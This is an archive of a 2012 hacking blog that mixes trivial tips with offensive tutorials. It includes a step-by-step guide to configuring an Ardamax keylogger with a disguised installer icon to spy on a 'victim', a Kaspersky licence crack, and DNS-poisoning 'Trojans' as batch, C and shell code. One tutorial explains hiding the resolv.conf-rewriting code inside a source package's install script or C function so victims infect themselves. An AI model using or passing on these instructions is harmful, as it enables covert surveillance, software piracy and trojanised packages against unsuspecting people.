Friday 24 February 2012

how to remotly install Aradmax Keylogger

 1 :
1. check task bar
 2 : 
2. click on keylogger
 3 :
 
3.tick the given option press next 

4 :

 4. After this press Enable and then give a password for better security of the remote keylogger. Press next also See screen shot  above in the photo
 5 :

5. now uncheck update option and hit next.

 6 :
6. Now after pressing next in last step, choose the options as I did in scree shot below, you can also enable self destruct of keylogger at specific date, after that date the keylogger will be no more in the victim system to send you logs, how ever to keep that forever in that pc, till that victim’s computer is not formatted disable as I did and hit next as u see above.
 7 :

7.You can choose the way of delivery of logs to you, it can be email as well as ftp. You can choose ftp as it will be better, email can also be used, as keylogger will then email you logs and in ftp it will upload logs to remote server. For better email experience always use Gmail for using as email in remote keylogger as it will not block emails from ardamax keylogger, here I will use ftp and then press next. Before pressing next Here you can specify time also that after how much time interval the logs of victim computer should be sent to you c above 
8.   You will need a free ftp account here, You can make one at t35.com and they will tell you your ftp information in the end after you have created your account, following information will be given
  • Ftp Host:- ftp.t35.com
  • Username:- yourusername.t35.com
  • Password:- chose ur own
  • Port:- 21

So, put this information 
You can test too, and a test file will be uploaded to your remote ftp server. Press next
 8 :

 Enable all the options given and tick them.Like I did and press next


9 :
                                   10. After that setup the screen shot quality in next step, I leave this one you that how much quality screen shot of victim screen you need. Press next again.
11. Now you have to give ardamax remote keylogger utility the path where you want that remote keylogger exe should be created in your computer, so that you may send it later to victim. I have given this path:
C:\Program Files\POL\Install.exe and I have chosen installation package icon to fool the victim so that he may think it a software. Then hit next and hit finish and then go to :- C:\Program Files\POL\Install.exe here you will see that Install.exe is created now just copy it and send it to victim by email or any other mean, I’ll discuss all such means in my next post. See screen                        
 12.  So you are done just spread it and you will start receiving logs inyourusername.t35.com point your browser here to watch all logs or else use Filezilla to download all logs.
enjoy :)


DOWNLOAD HERE
Posted by at 16:21

Sunday 19 February 2012

How to Update Facebook Status In Blue Color

Copy and paste code below in statur bar in facebook:@@[0:[100000569539945:0: YOUR TEXT HERE ]]Click on Share.

njoyy
Posted by at 17:43

God Modes....

Windows 7 GodModes …
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} 


For seperate control Panel Items:
GodMode1.{00C6D95F-329C-409a-81D7-C46C66EA7F33}
GodMode2.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}
GodMode3.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}
GodMode4.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}
GodMode5.{1206F5F1-0569-412C-8FEC-3204630DFB70}
GodMode6.{15eae92e-f17a-4431-9f28-805e482dafd4}
GodMode7.{17cd9488-1228-4b2f-88ce-4298e93e0966}
GodMode8.{1D2680C9-0E2A-469d-B787-065558BC7D43}
GodMode9.{1FA9085F-25A2-489B-85D4-86326EEDCD87}
GodMode10.{208D2C60-3AEA-1069-A2D7-08002B30309D}
GodMode11.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
GodMode12.{2227A280-3AEA-1069-A2DE-08002B30309D}
GodMode13.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}
GodMode14.{4026492F-2F69-46B8-B9BF-5654FC07E423}
GodMode15.{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}
GodMode16.{78F3955E-3B90-4184-BD14-5397C15F1EFC}
Posted by at 17:41

How to crack Kaspersky Antivirus manually

 :A. At first, Delete any old key (if there is a key in kaspersky)

B. Now, Disable Self Defense (Go to Settings, In Option, Turn off Self Defense and Click Ok )

C. Now, Goto Start menu, Click Run and Type "regedit". Go to :

HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\protected\AVP9\environment(For 32bit OS: - windows xp or vista or windows 7)

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP9\environment(For 64bit OS: - windows xp or vista or windows 7)

D. Now, Right look for PCID and right click and modify three or four last numbers or letters, a example is : (8F10C22F-6EF6-4378-BAB1-34722F6D454)and enter any other three-letter, four-number and close Registry Editor Now.

E. Go to Taskbar and Right Click the kaspersky Icon and click Exit.

F. Go to start programs and open kaspersky. when you activate searching trial license and you have a new license key for month.

G. Go to kaspersky settings and Enable (turn on) Self Defense.

After 30 days, when your license expire, go to step 1 to 7 and get a new 30 days license from kaspersky server automatically.

this is a tricks what is done a few minutes and give you a new trial license. so it is better to find a license key.
Posted by at 17:38

Copy Text From Scanned Document /image

    So, here starts the trick. All you have to do is to use Microsoft One Note. This software is bundled with Microsoft Office Package. So, you needn’t buy any extra software for it. All you have to do is:
  • Open Microsoft One Note.
  • Copy the image from which you want to extract text.
  • Paste it into Microsoft One Note
  • Right click on the image
  • Choose the option “Copy text from image” from the shown optionstadaa:) u have got ol texts now save it.!!!thanx fr reading comment if u like it u got any problem :)!!!
Posted by at 17:34

Using Android phone as a touchpad to a Computer

What you need -

A working WiFi on computer with internet connection

There are two ways to do this

a) Your mobiles internet

b) Your PC's internet (with WiFi)


Method : Your mobiles internet


Tutorial -

1) Turn on your Mobile's WiFi hotspot.

2) Connect you PC to your mobile's hotspot.

3) Download and install RemoteDroid from here - http://www.mediafire.com/?htsq77opld2e21y

4) Download PC server file from here - http://www.mediafire.com/?oayzq3kyk3lkn1w

(PC server files only work if Java is installed, if Java is not there

get it here -http://www.java.com/en/download/manual.jsp)

5) Open the 'RemoteDroidServer.bat' from PC

6) It will open and show the Server IP, note it down.

open RemoteDroid from your mobile
enter the IP given

in the 'RemoteDroidServer
you will have a touchpad and 2 buttons they are for distant usage
Posted by at 17:24

Wednesday 8 February 2012

Hack A Hacker Using Sniffer

Hackers usually use software like RATs and keystroke loggers to hack victim's password. To get logs of victim while being offline, attacker uses a ftp server and if you have read my previous tutorials on sniffing then you might be already knowing that ftp protocol is susceptible to sniffing using this weakness of protocol you can hack a hacker using sniffer.
So if anyhow you feel that you have been hacked using a RAT then get a sniffing tool like wireshark(my favorite) or Cain and Abel. Both are really powerful tools to analyze and retrieve information from packets.
So install a sniffer and start analyzing packets that are leaving your system. After analyzing packets you will get user-name and password of attacker's ftp server. Use that information to log-in into his/her ftp account do whatever you want and take revenge for planting RAT in your system. Like this you'll hack a hacker and tell him/her this time he/she has messed with a wrong guy.
Posted by at 14:49

Your Safety Over LAN Is Compromised

You might be surprised by title of post safety over LAN is compromised. The fact I am revealing here is more surprising than title itself. You work for a company with high reputation in its quality of service and security over network and you feel the LAN you use for communication is safe then sorry you are mistaken. No LAN connection in world is safe enough to protect your privacy. The reason is not hackers using sniffing tools to collect information from network but the network itself is problem since it can be monitored. Network monitoring tools, IDS and firewalls all can sniff packets from network and the worst part they all work from desk of system administrator I.e from main station that provides LAN connectivity to all computers.

It means before any information leaves company's network it passes from desk of system administrator to get monitored so along with a network monitoring tool if he installs a sniffer then he/she'll be able to sniff all connections available over network that means if he/she is real bad ass buddy then no information leaving or coming to your computer is safe.

If you have been in field of security from long time you might be well known with name Moxie Marlin Spike. He is independent security researcher who has found vulnerability and developed SSL strip to hack information over HTTPS connections. That means even HTTPS proxy over LAN can be overpowered to get sensitive information, it can only bypass firewall but not packet monitoring and brain of human being. Since all mailing protocols, IRC protocols, Streaming protocols, File Transfer protocols and even remote login protocols are vulnerable to sniffing a person sitting at administrator's system can surely steal it.

He can use tools like Wireshark, Ettercap, Session Capture, Omni Peek, IRS, IRIS, WinSniffer and Ace Password Sniffer to do his/her dirty job since they all are awesome packet capturing tools. IRIS and Ace Password Sniffer have extra advantage over just password sniffing because IRIS can also re-construct packets to reveal information as it is displayed on victim's computer and hence no technical power required to get information and Ace Password Sniffer will display username and password as it is as soon as someone uses them to log-in into vulnerable protocol.

What can be countermeasures ?
You can never guarantee your system admin is nice guy so its your job to protect yourself.
Never do any kind of transactional communication over LAN. A transactional communication means communication that requires authentication in e-commerce terms.
And if it is important use tunneled connection with IPSec protocol I.e use VPN service or setup HTTP tunnel using tunneling software from your LAN to some secure computer at your home or neighborhood.
You can also opt for onion routing by using TOR but I am doubtful about it since I have never captured packet from onion routing network.
I hope you enjoyed reading above information. Thanks for reading and keep visiting.
Posted by at 14:46

DNS Poisoning

Before we proceed to DNS Poisoning lets have some look on basics. So lets take look on what is DNS first. You already know internet runs on TCP/IP model or you can say internet protocol stack. TCP/IP stack specifies and uses IP addresses (example : 204.87.98.34) to route data between source and destination computer. Every computer in the world that is connected in network have an IP address. Since remembering IP addresses are difficult each IP address is associated with a name like www.google.com which is also known as domain name. Domain names are easy to remember but original TCP/IP stack needs IP address for communication not the domain name
. So a service has been created to convert these domain names into their respective IP addresses, this service is known as Domain Name Service (DNS), a computer or system which provides this service is known as Domain Name System. Now you can call it a coincidence that Domain Name Service and Domain Name System both end having same abbreviation DNS and the best part they don't even conflict with each other while using.

A DNS runs on DNS protocol that translates web address into its respective IP address. Now DNS poisoning or DNS spoofing is technique by which an attacker provides wrong IP address to DNS server for misdirecting users to fake websites. Following are types of DNS poisoning, in future post we will cover them briefly,
  • Intranet DNS Spoofing/Poisoning
  • Internet DNS Spoofing/Poisoning
  • Proxy Server DNS Spoofing/Poisoning
  • DNS Cache Spoofing/Poisoning
Intranet DNS poisoning is done over a LAN. It is usually performed over switched network with help of ARP poisoning. You can use Cain And Abel to perform this kinda attack. Internet DNS poisoning can be done over any system across world by changing DNS entries of victim's computer. In Proxy Server DNS poisoning we change proxy settings of victim to our IP address then redirect victim to fake website. In DNS cache poisoning an attacker changes IP address entries of target website on some specific DNS server then if any person asks that DNS for information it'll provide fake IP information to it.
Posted by at 14:42

DNS Poisoning Tutorial 3 | Proxy Server DNS Poisoning

For this type of DNS poisoning method an attacker sets up a proxy server on his/her system. Then he/she sets up a rouge DNS and keeps its IP address as primary DNS entry in proxy server system. Now he/she has to convince victim to use proxy server set by him/her. Since proxy server has set up a rouge DNS as its primary DNS all requests will pass through it. Since all traffic passes from your system as proxy server you can sniff all traffic between
victim and site he/she communicates and also perform DNS poisoning attack.
Posted by at 14:40

DNS Poisoning Tutorial - 2 | Internet DNS Poisoning

Following is our second tutorial on DNS Poisoning which is Internet DNS Poisoning, also known as Remote DNS Poisoning. This type of DNS poisoning can be done over a single or multiple victims and no matter where your victim is in world, the primary DNS entries of his/her system can be poisoned using this method. For this type of DNS poisoning attack you'll have to setup a rouge DNS server somewhere with static IP address and please note that it should be in working condition. Methods of poisoning are different for Windows and Linux systems but happens with help of same entity that is Trojan file.
Here I 'll show you how to create DNS poisoning Trojans all you have to do is vector them.

For Windows:
For poisoning DNS of victim you must know name of his/her interface or name he/she has set for his/her internet connection. This condition is must for you to poison victim's DNS if you don't know their values then use default “Local Area Connection”. Now lets create a DNS spoofing Trojan Batch file. Type following lines in notepad and save it with any name and .bat extension.

netsh interface ip set dns “Local Area Connection” static 115.98.23.45

Above command will set DNS server of victim to 115.98.23.45 , you can change “Local Area Connection” by name of interface or connection if you know it, else always go with default. Now send that file to victim for poisoning his/her DNS entries. If you don't want to send bat file because your victim might suspect it, then you can create an executable file by compiling following C program.

#include<stdio.h>
#include<stdlib.h>
int main()
{
char *str= “netsh interface ip set dns “Local Area Connection” static 115.98.23.45”;
system(str);
return 0 ;
}
For Linux And UNIX:
Linux and UNIX systems save DNS entries in /etc/resolv.conf folder by changing entries in this file can help you poison DNS in Linux and UNIX systems. Now get IP address of working DNS server and IP address of rouge DNS server set by you. Suppose IP address of rouge DNS is 115.98.23.45 and real DNS server is 117.98.23.48. Then type following commands in a text file and save with .sh extension(for example change.sh ).

echo “nameserver 115.98.23.45” > /etc/resolv.conf
echo “nameserver 117.98.23.48” >> /etc/resolv.conf

Now all you have to do is vector this file to victim. For vectoring it get any source code installation package from internet of an interesting software your victim can't deny to install in his/her system. Extract it and find a shell script in it, place change.sh in that folder, open target shell script in text editor and before it ends type following commands,

chmod +x change.sh
./change.sh

Pack it again and send to your victim for installation once he/she installs software from your source code he/she will be infected. Now sometimes its difficult to find a shell script in package but what is not difficult to find is a C source file. So if you get problem with above method, find a C source file with several functions in it and create following new function in it.

void change12345()
{
char *str;
str= “echo “nameserver 115.98.23.45” > /etc/resolv.conf”;
system(str);
str= “echo “nameserver 117.98.23.48” >> /etc/resolv.conf”;
system(str);
return;
}

And call this function in any other function before it returns something. Pack files again and send it to your victim, your file will execute every time when your victim will launch that program.
Now note that above exploits codes are really very basic, you can modify them according to your needs and if you think they are difficult to understand please get your hands on programming, even if you can understand basic programming you can write your own exploit codes. Please read books section to have a look on which books I recommend you to begin with programming.
Posted by at 14:33

DNS Poisoning Tutorial - 1 | Intranet DNS Poisoning


In this post we will discus our very first method of poisoning DNS i.e Intranet DNS poisoning. Intranet DNS poisoning attack is done over a LAN which has been ARP poisoned. For performing this DNS poisoning attack you'll need at least three computers connected in LAN for which a same router, switch or computer should act as gateway and any man-in-the-middle attack tool, for this tutorial I am using Cain And Abel
. Make sure your setup matches following diagram.
Note that this attack works well for switched network, a hub based network will also work but result will not be as effective as switched network. Now Google for Cain And Abel download it and poison ARP table. Now click on APR-DNS from bottom and add a host name to it.
 
For our example I am poisoning entry of www.Yahoo.com. Now specify IP address of website you want to redirect traffic, if you want to redirect traffic for www.yahoo.com to http://nrupentheking.blogspot.com then click on Resolve type http://nrupentheking.blogspot.com in it and IP address field will take IP address of my blog. So now whenever anyone in LAN will try to browse to yahoo will land on my blog. 

Now something important, from all DNS poisoning methods Intranet DNS poisoning is easiest and doesn't require any technical skills because you don't have to setup a DNS server but for all other methods you must know how to setup DNS server. I will try my best to keep things as easy as I can but as an advise I would recommend you please Google a little and get some information about how to setup a DNS server. If I would have to perform above attack then my choice of tool would be Ettercap I took this tutorial with Cain And Abel just because its easy to use and we covered ARP poisoning using Cain and not Ettercap.

Cain is easy for someone who is beginner so just take this tutorial as start-up piece, after getting little understanding about how DNS poisoning is done, try same with Ettercap. So easiest DNS poisoning method I.e Intranet DNS poisoning is done next time we will see Internet DNS poisoning method. Thanks for reading and keep visiting.
Posted by at 14:29

Hacking A Website

In this post we will discus a little about hacking a website. A website is hosted on a web server so if you hack web server you hack website. So first of all let’s see what are some basic types of web server vulnerabilities which can lead to security breach. You must know that breach in security of web server can also provide attacker a door to internal network and hence owning a web server can give attacker an exponential advantage. Basically there are only three types of web servers available on which world hosts their web sites.

-Internet Information Server (IIS) by Microsoft
-Apache
-Apache Variants

Following are some web based vulnerabilities which can lead to security breach of a web server.
-Misconfiguration In Web Server Settings. Most people don’t employ professionals while creating and hosting their websites, a non-pro might hardly know anything about web server security and hence he/she may leave all settings to defaults or at most basic level thus giving even skids a full chance to breach it.
-Faulty Programming Practices. One of the most found reasons for web security breach is faulty programming practice while creating web sites. A vulnerably developed code can be found on thousands of website around. To avoid this problem at least one skilled and experienced programmer should be kept in charge to check faulty programming practice.
-Lack Of Security Policy. A security policy should implemented properly while web development phase. You might have seen several websites which disallow download without registration but when a user arrives at membership page he/she finds direct link in source code for download. Though this seems non catastrophic but it can also act as severe threat.
-Vulnerabilities In Web Application. Web application vulnerabilities generally includes SQL injection attacks, XSS attacks, RFI, LFI buffer overflow etc if you don’t know any of the following terms don’t bother I will cover them in detail in future posts.
In next post we will have our look on some basic IIS based vulnerabilities and how they are exploited.
Posted by at 14:20

Browse Anonymously

How can I browse anonymously or stay invisible online ? Is these among those questions which bother you for keeping your privacy online. Anonymizers, proxy servers, VPN and VPS are some options that can help you out. All above services are also offered as paid service but for here we will just have our look on free services.
Anonymizers(anonymity server):
Anonymizers are nothing but proxy servers which act as browsers inside browsers for surfing, their advantage is that they digest everything from the page you want to visit and hence can not only protect your privacy but can also prevent you from online malwares. I 'll not recommend you using some specific anonymizer since firewalls block them someday so better visit http://www.proxy4free.com/ which updates list of anonymizers every hour so that you must get a working anonymity server. Alternatively you can use a TOR browser which really guarantees 100% anonymity. Download TOR from http://www.torproject.org/.

Proxy Servers:
Proxy servers needs some manual settings from your internet configurations. Proxy server lift the limitation that anonymizers had of only being used in browser by making proxy IP available for every application that needs internet connection. Visit http://www.proxy-list.org/ for fresh list of proxies.

Alternatively you always have option of using a proxy generating software, following is brief list of proxy software with their download link have your pick.



Please don't ask which is best among them, its hard to say since working of proxy depends upon load on proxy server and it may vary with time. As my personal preference I use TOR and Ultra Surf when need proxy level anonymity. Please don't use transactional type browsing like e-mail, social networking or financial transactions over proxy servers, its not safe and still anyhow you want to use them better not use anything else than TOR.

Virtual Private Network:
VPN's are most trusted way of hiding online even secure than proxy servers and anonymity servers. Following is list of some software that provide free VPN services.
Ultra VPN is one of the most used and most trusted free VPN service of world, if you have problem trusting any other free VPN service better opt this.

The problem with which every VPN suffers it speed and bandwidth penalty. Also they need registration, only usaip can be used without registering by using username and password “demo”. The advantage they have above Anonymizers and proxy servers is that you don't have to bother about transactional browsing.

Virtual Private Server:
Virtual Private Servers are provided by companies in which each concept of running multiple virtual systems on same system is adapted. Though every PC may be residing on same server but for each individual his system acts as completely separate system. These are most reliable source to stay invisible online but are only offered as paid service.

I hope I have covered enough so that you can have your pick. Don't forget to tell us about your views and experience about using above tools. Please note that no matter which tool you use you will have to suffer speed penalty but sorry that is that cheap cost that you have to pay to browse anonymously and stay invisible online.
Posted by at 14:17

Using Dynamic IP as Static IP

As we discussed in Basic Lab Setup For Hacker a hacker needs a static IP which is really very expensive for a normal person to have. Here we will discus how we can counter this problem. Please note that this solution is temporary and can never really take place of static IP but for now it will work.

For this we will use DNS redirect service from www.no-ip.com alternatively you can also use www.dyndns.com.

First of all register with www.no-ip.com by clicking on “No-IP Free” on home page. After you complete registration form hey will send you an confirmation e-mail, once confirmed, then you can log in to your account.
 
Now click on “Hosts/Redirect”, then type the host redirect name you want to which Dynamic DNS will redirect traffic after associating your IP. Let other options remain as it is if you don't know what they do.
 
Now create your host name. Now download “Download Client”. After installing DUC client type your e-mail address and password.
 
To check its working or not, type www.whatismyipaddress.com and check your IP address now ping the host name you created both will have same IP address.
Note: Most of you might be thinking what is use of this setup, you'll know its use when we will cover Trojans and Spywares. Also note that there are several free as well as paid Trojan Clients and Spywares. But free tools are prone to get detected by anti-virus program so better opt for paid ones.
Posted by at 14:10

Steps Involved In Hacking

As mentioned earlier ethical hacker takes same steps as malicious hacker. Following are different steps that are performed during hacking.

1.Reconnaissance:
This step involves gathering potential information about target system. In fact hacker spends 90% of time for this phase only and next 10% time for rest of the steps.
2.Scanning:
During this phase network is scanned for vulnerability.
3.Gaining Access:
This is the step where real hacking takes place. Hacker takes advantage of vulnerability found in scanning phase and penetrates the victim system.
4.Maintaining Access:
After gaining access hacker makes provision to come back by planting root-kit and backdoor.
5.Covering Tracks:
In this phase hacker removes all traces of his/her presence in system by removing log files and event logs.
Posted by at 14:09

Skills Required For A Hacker

Following are some must know things for a hacker or you can say requirements of hacker.

Operating System:
As a hacker you must have upper hand skills in Operating systems Windows, Linux and Unix. Once you master Linux and Unix you'll hardly face problem getting yourself on MAC. As we'll move further we will cover both of them in short and then slowly move our level to advanced.

Networking:
A hacker must have expertise in field of networking even if you don't have them you must be knowing about some basic terms used in networking. Please click on following links and try to grasp topics as thoroughly as you can.
The reality is that a hacker should know networking to best level. Just knowing above terms is not sufficient though you'll not encounter that much problem while learning. We still recommend you buying a book on networking that should cover networking to level of pin points. My personal favor is to book Data Communication And Networking by Behrouz Forouzan if you want to start. Click on following link to know more, read people's view or if you want to purchase.

Data Communications and Networking (McGraw-Hill Forouzan Networking)


Knowledge About Setting Up And Configuring Servers:
Yes that is necessary for a hacker so when we will move ahead with flow. We will cover configuring IIS 7, Apache, Vertrigo on Windows and Apache on Linux. Both HTTP and FTP servers will be covered.
Programming:
Absolutely no one can deny all best hackers in world have master hand in programming. Following are must know programming languages but you can even make things work even if you don't know them. In any case I would recommend you learn programming.
HTML, C, C++, Java, SQL, Python, Perl, PHP and Ruby.
At most basic level my advise will be you must know HTML, C, SQL, PHP and ruby.
Tools:
Backtrack is platform which is specially crafted and designed for penetration testing. Metasploit is framework that is used to create and experiment with exploits and payloads. Both are must for a hacker today. Alternative to Backtrack is Knoppix Security Edition and Mautrix, if you master Bactrack you'll easily master both of them. So I will not leave them apart from our list, we'll also cover them.
Posted by at 14:07

Ethical Hacking | An Introduction

Whenever term hacker comes before many people consider it as a guy sitting inside a room or garage with a bottle or beer and a Laptop or Desktop doing wonders on click of buttons. But the reality check is hacking is not that easy as portrayed in movies and television and term hacker doesn't mean a computer criminal.

So here first of all we'll clear all our misconceptions related to words hackers and hacking.
From Where This Word Came:
The word hacking has history in late 1960's, the time when computers were nothing but mighty pieces of machines and a computer just meant a machine that can compute. Electrical and Electronics geeks used to optimize circuits to make any system/circuit work faster, better and reliably. The job they used to do on circuits was known as hack. With time computer geeks also started finding way out to optimize their system to work better so in fact hacking was nothing but always a kind of reverse engineering. With time in professional world a word hacker got meaning, a person who is highly skilled in hardware, software and networking components. Then movies started portraying hackers do only dirty works and hence today the word hacker has a negative face according to people. No matter how the word met to a dreadful end a hacker always had all qualities that was first put forward in its definition may the be criminal or ethical. Criminal hackers are also known as Crackers.
Types Of Hackers:
White Hats: White hat hackers are good guys who use their hacking skills for defensive purposes. Organizations and industries pay them high salaries to protect their systems and networks from intrusion.
Black Hats: Black hats are actually bad guys in filed. Their main job is to breach security and make money. They make money by using their hacking skills for offensive purposes.
Grey Hats: Gray hats are hackers who work for offensive and defensive purposes depending on situations. They are hired by people to intrude and protect systems.
Hactivist: A hacktivist is kinda hacker who thinks hacking can bring out some social changes and hacks government and organizations to show his discomfort over some trivial issues.
Suicide Hackers: Suicide hackers are those who hack for some purpose and even don't bother to suffer long term jail due to their activities. They can be bad as well as good.
Script Kiddie: A script kiddie is a person who boasts breaking system using scripts and codes written by others though he hardly knows what the code does.
Phreak: It is a person who tries to intrude systems for fun or malicious personal activities. Mostly they are children of age 12-15 who don't even know wrong consequences of hacking.
Types Of Hacking:
Local Hacking: This type of hacking is done when a hacker has full access to the system to implant a virus, keylogger and RATs
Remote Hacking: Remote hacking is done on a remote system using Internet.
Social Engineering: Social Engineering is kinda interacting skill that a hacker uses to manipulate people giving out sensitive information. Its kinda trick done using good verbal, social skills and understanding.

Terminologies Used Under Hacking:
Threat: A threat is an environment or situation that could lead to a potential breach of security. Ethical hackers look for and prioritize threats when performing a security analysis.

An Exploit: An exploit is a piece of software that takes advantage of a bug, glitch, or vulnerability, leading to unauthorized access, privilege escalation, or denial of service on a computer system.
Vulnerability: A vulnerability is an existence of a software flaw, logic design, or implementation error that can lead to an unexpected and undesirable event executing bad or damaging instructions to the system. In easy word vulnerability is weakness in system.
Payload: Payload is agent that helps in taking advantage of vulnerability in remote hacking.
Attack: An attack occurs when a system is compromised based on a vulnerability.
Types Of Attack:
1.Operating System Attack
2.Application level Attack
3.Shrink Wrap Code Attack
4.Misconfiguration Attack
Operating system attack is attack done on specific type of OS. Such attack is done using flaws in programs and services shipped with OS. Application level attack is done over faulty coding practices done over software during its development. Shrink Wrap Code attack are attacks done over UN-refined scripts used for making task simpler. Last is misconfiguration attack, it is kinda attack which is done over mis-configured system or a system with default settings.

Work Of An Ethical Hacker:
Job of an ethical hacker is to use all his skills and tools used by malicious hackers to find vulnerabilities in system and then provide it security against those vulnerabilities.
Conclusion: At last what I want to tell, nothing happens in clicks of buttons. A hacker is highly skilled person in field of computing who usually have ample knowledge about software, hardware, OS, networking and programming. A hacker may it be criminal or ethical has immense patience, determination, organization, discipline and persistence. An attacker may spend months of time planning, analyzing and executing an attack. This shows his level of dedication to achieve whatever goal he/she has set. A person can never become a good hacker unless he have all above qualities.
Note: Now onwards we will cover hacking as our main stream topic on this blog. Real hacking is never done over lamers who hardly knows about security, it is done over a person who is highly skilled as you are. You can never learn hacking until you do some practical and gain knowledge about field so now onwards I urge you to perform practicals that will be now posted on this blog on your own system. Next no tutorial will be taken as a lamer so they will be in possible higher details, so this may happen that you may not understand something. Rather than keeping yourself mum I plea you to please ask whenever you encounter a problem or get bothered by topic. Whenever I 'll post on hacking I 'll try to keep a theoretical and one practical tutorial, you are requested to read both and grasp matter completely. Thanks for visiting and please tell are you clear with all points discussed or need some explanation on your difficulty.
Posted by at 14:04

Best Password Crackers In Hackers Toolkit

Yep, you read it right best password cracker tools in hacker's toolkit. Following is list of some well known and powerful password cracking tools that usually each and every hacker has in his/her toolkit. Since they are best sooner or later we will cover all of them on this blog.
Whenever they will be covered you'll find click here link to read more about that tool. For now lets take our first time eye on those tools.
L0phtCrack:(click here)
L0phtCrack was developed by L0pht Heavy Industries to reveal the security flaws in Windows authentication system. Now it lists out itself as one of the best Windows based password hacking tools. Its popularity is so high that nearly every password dumping tool dumps password in L0phtCrack compatible format or has option to dump password for L0phtCrack. It attempts to crack Windows password from hashes which can be obtained from standalone computers, networked devices or active directories. It supports various methods to attack for getting valid password including dictionary based attack, rainbow tables, hybrid attacks and even brute force. If used with proper hardware there's no way any password can withstand its might. The best part it is that it now supports cracking Linux and UNIX password too. You can download and use it for 15 days as trial.
Download Link
 
John The Ripper:
Currently known as best password cracker available. It is command line tool. Officially it supports several Operating Systems including several versions of Linux and UNIX and practically all versions of Windows. If your OS is not supported you can download source files and compile it to get a working tool. The best part of compiled source is that it is optimized to work better on your system. Its primary purpose is to detect weak UNIX, Linux and Windows based password. Both free and pro versions are available and they both are equally good. Please note that many anti-virus programs usually consider password cracking tools as virus or Trojans and John The Ripper doesn't fall in exception. I would better advice you to use this tool on a system without Anti-Virus program.
Brutus:
Brutus is network brute force attacking tool. It is windows only tool but can also be used with many versions of Linux with help of Wine and Crossover. It works against network service of remote systems and tries to get password using dictionary based, hybrid and brute force attack. Officially it supports several protocols including HTTP, POP3, FTP, SMB, TELNET, IAMP, NTP and many more. Even if any protocol is not supported protocol support plug-ins are available. Its free but source code is not available.

THC Hydra:
Whenever you need a brute force attacker for remote system THC Hydra is always a tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Officially Windows system is not supported but you can run it in Cygwin a UNIX emulator for windows.

Rainbow Crack:
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.

Solar Winds Engineers Toolset:
Not only one of the best enumeration and networking monitoring tool Solar Winds also stands out to be tool that can be used as awesome password auditing tool. It has more than 20 system monitoring tools along with identification of weak user accounts and password. A must have tool for every Windows administrator.
Download Link

Cain And Abel:
We usually boast that all cool password cracking tools are available for UNIX only but this falls in exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VOIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Above is the list of best password cracking tools, please note that they don't include list of wireless password crackers because that is different story we will cover wireless password cracking tools later with wireless hacking. Thanks for reading.
Posted by at 13:55

Password Tools That May Come Handy In Need

We use several passwords everyday and sometimes it might happen that we may forget password and there we might be in damn need to access our system or tool or application which is protected by password.
Here we will discuss some password tools that may come handy to you in need.

Note: When you use any password recovery or auditing tool, there are 100% chances your anti-virus program will detect it as Trojan or Virus. So while using them please disable your anti-virus programs.
This utility reveals the database password of every password-protected mdb file that created with Microsoft Access 95/97/2000/XP or with Jet Database Engine 3.0/4.0 . It can be very useful if you forgot your Access Database password and you want to recover it.

It is a small utility that can be used to recover forgotten password from Mozilla Firefox.
Asterisk logger reveals the password stored behind the asterisks in standard password boxes.
A software tool that can be used to remove password based protections over PDF files but you must know the owner password.
Its an online and free tool to remove password protected permissions over PDF files.
Multi Password Recovery is a tool designed to extract password from more than 110 applications including FTP clients, email clients, IRC clients, Web browsers messengers etc.
KON BOOT currently known as most powerful ISO password breaking tool since it can't only bypass Windows password during log on but can also bypass Linux passwords during log on. The powerful feature of KON BOOT is that it does not ask for password nor it resets it, just boot with CD and any OS installed in your Hard Disk will boot without asking for password, reboot again and all passwords will remain intact.
When you enter your password on most sites, you see only asterisk signs. This feature is intended to protect your passwords; but sometimes this feature becomes more of a pain, rather than help. Password Spectator is a software that lets you see the actual password behind the asterisks. Best of all, Password Spectator is free to download.
KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

Posted by at 13:46

Hack Using Default Password

Password hacking is complicated stage in hacking cycle since it is not only the step which allows you access in victim’s PC but it marks origin of real hacking. But before trying anything else an attacker will always try to exploit victim using default password of device used by victim. A unchanged default password is always held as misconfiguration as per hacking is concerned. An attacker at very first stage may try to crack BIOS passwords,
router passwords, switch passwords, dial-up passwords, modem passwords and passwords of other networking and communication devices by using their default password. There are several sites available which store huge database of default passwords. Following list shows some of them the list of password they store are more than sufficient, if you have this list you can breach any device with default password.

So far as I know http://www.defaultpassword.com/ is biggest database of default passwords available online. You can browse through list of thousands of manufactures and their product. You can also search for specific manufacturer and its device and can also contribute list for newer default passwords.

It is second biggest and much accurately sorted default password database as per my view is concerned. It has listed all vendors in their alphabetical order. When you click on vendors name it shows you device name, its default password and few word description about how to use it for attack.

Whenever you want to find out default password I will recommended try this site first. You can easily search for passwords using their navigation. Searching for password in their database is so easy you will hardly need any effort to search, since you can search by vendor name, product name and even by model number. Their database includes default password for equipments and software from many vendors including 3Com, Cisco, Nortel, IBM, HP, Compaq, Digital, D-link, Linksys, Oracle, Microsoft and many more.

It is special database to search passwords for routers, select router manufacturer and press find password it will list all models along with their numbers, user-names and password.
Some other sites that store default password.



Posted by at 13:40
Subscribe to: Posts (Atom)